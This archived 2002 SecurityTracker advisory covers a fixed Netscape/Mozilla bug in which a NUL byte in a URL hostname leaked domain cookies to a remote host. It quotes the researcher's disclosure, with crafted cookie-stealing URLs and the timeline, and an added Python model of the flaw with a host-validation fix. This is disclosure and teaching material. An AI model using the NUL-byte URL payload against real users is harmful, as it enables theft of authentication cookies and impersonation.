SecurityTracker.com
Category:   Application (Web Browser)  >   Netscape
Vendors:   America Online, Inc.
Netscape Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain
SecurityTracker Alert ID:  1003324
SecurityTracker URL:  http://securitytracker.com/id/1003324
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 22 2002
Impact:   Disclosure of authentication information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.1
Description:   An information disclosure vulnerability was reported in the Netscape web browser. A remote web site may be able to access a user's domain-based cookies for a different domain.

It is reported that a remote user can obtain a target user's cookies for any domain if the target user loads a malicious URL.

If the target user (the victim) loads the following type of URL, the user's browser will connect to 'HostOne' and the cookies for the 'HostTwo' domain will be supplied to 'HostOne'.

http://[HostOne]%00[HostTwo]/cgi-bin/cookies

It is reported that only domain cookies can be obtained, not cookies set for a specific hostname. For example, cookies set for www.netscape.com cannot be obtained, while cookies set for the .netscape.com domain can be obtained.

A demonstration exploit is available at:

http://alive.znep.com/~marcs/security/mozillacookie/demo.html

Impact:   A remote user can access another user's cookies for any domain.
Solution:   The vendor has released a fixed version (6.2.1), available at:

http://home.netscape.com/download/index.html?cp=dju1

Vendor URL:  home.netscape.com/security/
Cause:   Access control error
Underlying OS:   Linux (Any), MacOS, UNIX (Any), Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
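The bug described above is a disagreement between two parsers inside one browser: the connection step handed the percent-decoded host to a C-style routine that stopped at the first NUL byte, while cookie selection matched on the whole decoded string. The following Python model, added here as an illustration and not taken from the advisory or from the linked demonstration, shows why that mismatch leaks domain cookies but not host-only cookies, and how validating the host once and reusing the same value for both decisions removes the inconsistency. The cookie jar, the function names (buggy_request, hardened_request, validate_host, is_valid_host, cookies_for_host) and the simplified domain-matching rule are all constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed cookie jar for the demonstration: one cookie set for the exact
# host www.passport.com and one set for the whole .passport.com domain.
COOKIE_JAR = [
    {"name": "host_session", "domain": "www.passport.com", "host_only": True},
    {"name": "domain_session", "domain": ".passport.com", "host_only": False},
]

# One DNS label: letters, digits and hyphens only (no NUL or other control bytes).
HOST_LABEL = re.compile(r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$")


def cookies_for_host(host, jar):
    """Simplified Netscape-style cookie selection: a host-only cookie needs an
    exact host match; a domain cookie matches any host ending with its domain."""
    matched = []
    for cookie in jar:
        if cookie["host_only"]:
            if host == cookie["domain"]:
                matched.append(cookie["name"])
        elif host == cookie["domain"].lstrip(".") or host.endswith(cookie["domain"]):
            matched.append(cookie["name"])
    return matched


def buggy_request(url_host, jar):
    """Model of the fixed bug: the decoded host goes to a C-style connect routine
    that stops at the first NUL byte, while cookie selection sees the whole
    decoded string. Returns (host connected to, cookie names that would be sent)."""
    decoded = unquote(url_host)
    connect_to = decoded.split("\x00", 1)[0]            # what the socket layer sees
    return connect_to, cookies_for_host(decoded, jar)   # what the cookie code sees


def validate_host(url_host):
    """Decode once, normalise, and reject any host whose labels contain
    characters outside the DNS label alphabet. Raises ValueError on failure."""
    host = unquote(url_host).lower().rstrip(".")
    labels = host.split(".")
    if not host or not all(HOST_LABEL.match(label) for label in labels):
        raise ValueError("malformed host component: %r" % url_host)
    return host


def is_valid_host(url_host):
    """Boolean convenience wrapper around validate_host."""
    try:
        validate_host(url_host)
        return True
    except ValueError:
        return False


def hardened_request(url_host, jar):
    """Validate the host first, then feed the same validated value to both the
    connection step and the cookie selection step, so they cannot disagree."""
    host = validate_host(url_host)
    return host, cookies_for_host(host, jar)


if __name__ == "__main__":
    crafted = "alive.znep.com%00www.passport.com"   # shape of the URL in the advisory
    print("buggy model:", buggy_request(crafted, COOKIE_JAR))
    print("host accepted by validator?", is_valid_host(crafted))
    print("hardened:", hardened_request("www.passport.com", COOKIE_JAR))
```

In the buggy model the crafted host connects to alive.znep.com yet carries domain_session, because the full decoded string still ends with ".passport.com", whereas the host-only cookie needs an exact match and is never sent; that is exactly the domain-versus-host distinction the advisory reports. The hardened path rejects the crafted host outright, and for a well-formed host both the connection and the cookie lookup use one canonical value, which is the general lesson: parse and validate a hostname once, then never re-derive it from the raw input elsewhere.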

Message History:   This archive entry has one or more follow-up message(s) listed below.
(HP Issues Fix) Netscape Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain   (support_feedback@us-support.external.hp.com (IT Resource Center ))
The vendor has released a fix.



Source Message Contents

Date:  Mon, 21 Jan 2002 21:10:37 -0800 (PST)
Subject:  Mozilla Cookie Exploit


A while ago I discovered a bug in Mozilla that lets you steal cookies for
any domain by convincing the browser to load a specially formatted URL; I
have been too busy to get around to making the details known earlier, so
here they are.  This is similar to holes that have been found, both by
myself and by others, previously in IE.  Details available at
http://alive.znep.com/~marcs/security/mozillacookie/ and are also included
below.  Update to Netscape 6.2.1 or Mozilla 0.9.7 for a fix.  Using open
source products doesn't magically make you invulnerable to security
problems like those that plague Microsoft.


                           Mozilla Cookie Exploit
                        Marc Slemko <marcs@znep.com>
                Last Modified: $Date: 2002/01/22 05:06:04 $
                              $Revision: 1.6 $
                                      
Table of Contents

   [1]Executive Summary
   [2]What's New
   [3]Background
   [4]Details
   [5]Example Exploit
   
Executive Summary

   Cookies are often used to identify and authenticate users to a
   website. If an attacker can steal a user's cookies, then they can
   impersonate that user. The completeness of the impersonation and the
   actions the attacker can perform as that user depend on how the
   particular site uses the cookies.
   
   This bug in Mozilla allows an attacker to, if he can convince the
   user's browser to load a given URL, steal their cookies for any given
   domain. It does not require that active scripting is enabled in the
   browser, and can be done with something as simple as an image tag,
   allowing for hassle-free use in HTML email, web based email services,
   etc.
   
   As expected, this bug is also present in Netscape 6.1. Upgrade to
   Netscape 6.2.1 or Mozilla 0.9.7 or higher, which fix this bug.
   
   The take-away message is that, due to implementation bugs in browser
   and in web applications, cookies can be stolen. It is critical that
   any application that depends on cookies does so with an understanding
   of this fact, and takes appropriate measures to limit the damage that
   can be done using stolen cookies.
   
What's New

     * Current Status Summary: (last updated Mon Jan 21 20:48:17 PST
       2002) I finally got around to making this vulnerability public.
     * mid-Jan 2002: Netscape put up a [6]note on their site saying that
       there was a security hole that they fixed.
     * Sometime between when I reported this bug to Netscape and when I
       made it public: This bug was fixed with the release of Netscape
       6.2.1 and Mozilla 0.9.7.
     * November 15, 2001: I reported this bug to Netscape via their
       security bug submission form. I had trouble finding a documented
       method for submitting security bugs to mozilla.org, but eventually
       figured out that security@mozilla.org existed. In any case, both
       submissions found their way to the same contact at Netscape.
       
Background

   Cookies are the mechanism used by most websites to identify and
   authenticate a user. If you can steal someone's cookies, you can trick
   the server into thinking you are them. Exactly what this gains you
   depends on the application and how it is designed. It may gain you
   very little, or it may gain you a whole lot (e.g. [7]Microsoft Passport
   to Trouble). For more information about cookies, see [8]The Unofficial
   Cookie FAQ.
   
   Cookies are set with a specific hostname or a domain, so that they are
   only sent to that host or domain, with an exception or two that I
   won't go into here. They can also be set with a specific path, or with
   the secure flag, which means they will only be sent if the connection
   is an SSL connection. Normally, this should mean that only the server
   that set the cookie, or others it is operating in cooperation with
   (e.g. in the same domain) can read it.
   
   Mozilla has a bug that lets you bypass this protection and steal
   cookies for any domain. This is quite similar to bugs found in
   Microsoft Internet Explorer in the past, such as [9]this one and
   [10]this one. As has been shown time and time again, there are many
   security flaws in many Microsoft products. Sadly, they are far from
   being alone. There is almost certainly no web browser out there that
   is functional enough to browse a significant percent of current
   popular websites and that does not have similar security holes.
   
Details

   The details are very trivial. Loading a URL such as:
        http://alive.znep.com%00www.passport.com/cgi-bin/cookies

   ...will cause Mozilla to connect to the hostname specified before the
   "%00", but send the cookies to the server based on the entire
   hostname. The "%00" is the URL encoded version of the null character,
   used in C to terminate strings.
   
   This exploit can be used to steal cookies with a specific path set,
   and can be used to steal cookies with the secure flag set, by using
   the specific path and SSL in the request URL. Note, however, that
   cookies set for a specific hostname (e.g. "www.passport.com") can not
   be stolen using this method, but only cookies set for an entire domain
   (e.g. ".passport.com").
   
   This bug was first tested on Netscape 6.1 on Windows 2000 and Mozilla
   0.9.5 build 2001111503 and 0.9.5 build 20011012 on Linux. It is
   expected that all Netscape 6.x and Mozilla versions prior to the
   recently released fixed versions are vulnerable.
   
Example Exploit

   An example exploit [11]is available. Very straightforward.
     _________________________________________________________________
   
   $Id: index.html,v 1.6 2002/01/22 05:06:04 marcs Exp marcs $
     _________________________________________________________________

References

   1. http://alive.znep.com/~marcs/security/mozillacookie/#executivesummary
   2. http://alive.znep.com/~marcs/security/mozillacookie/#history
   3. http://alive.znep.com/~marcs/security/mozillacookie/#background
   4. http://alive.znep.com/~marcs/security/mozillacookie/#details
   5. http://alive.znep.com/~marcs/security/mozillacookie/#example
   6. http://home.netscape.com/security/
   7. http://alive.znep.com/~marcs/passport/
   8. http://www.cookiecentral.com/faq/
   9. http://alive.znep.com/~marcs/security/iecookie1/
  10. http://alive.znep.com/~marcs/security/iecookie2/
  11. http://alive.znep.com/~marcs/security/mozillacookie/demo.html

Copyright 2014, SecurityGlobal.net LLC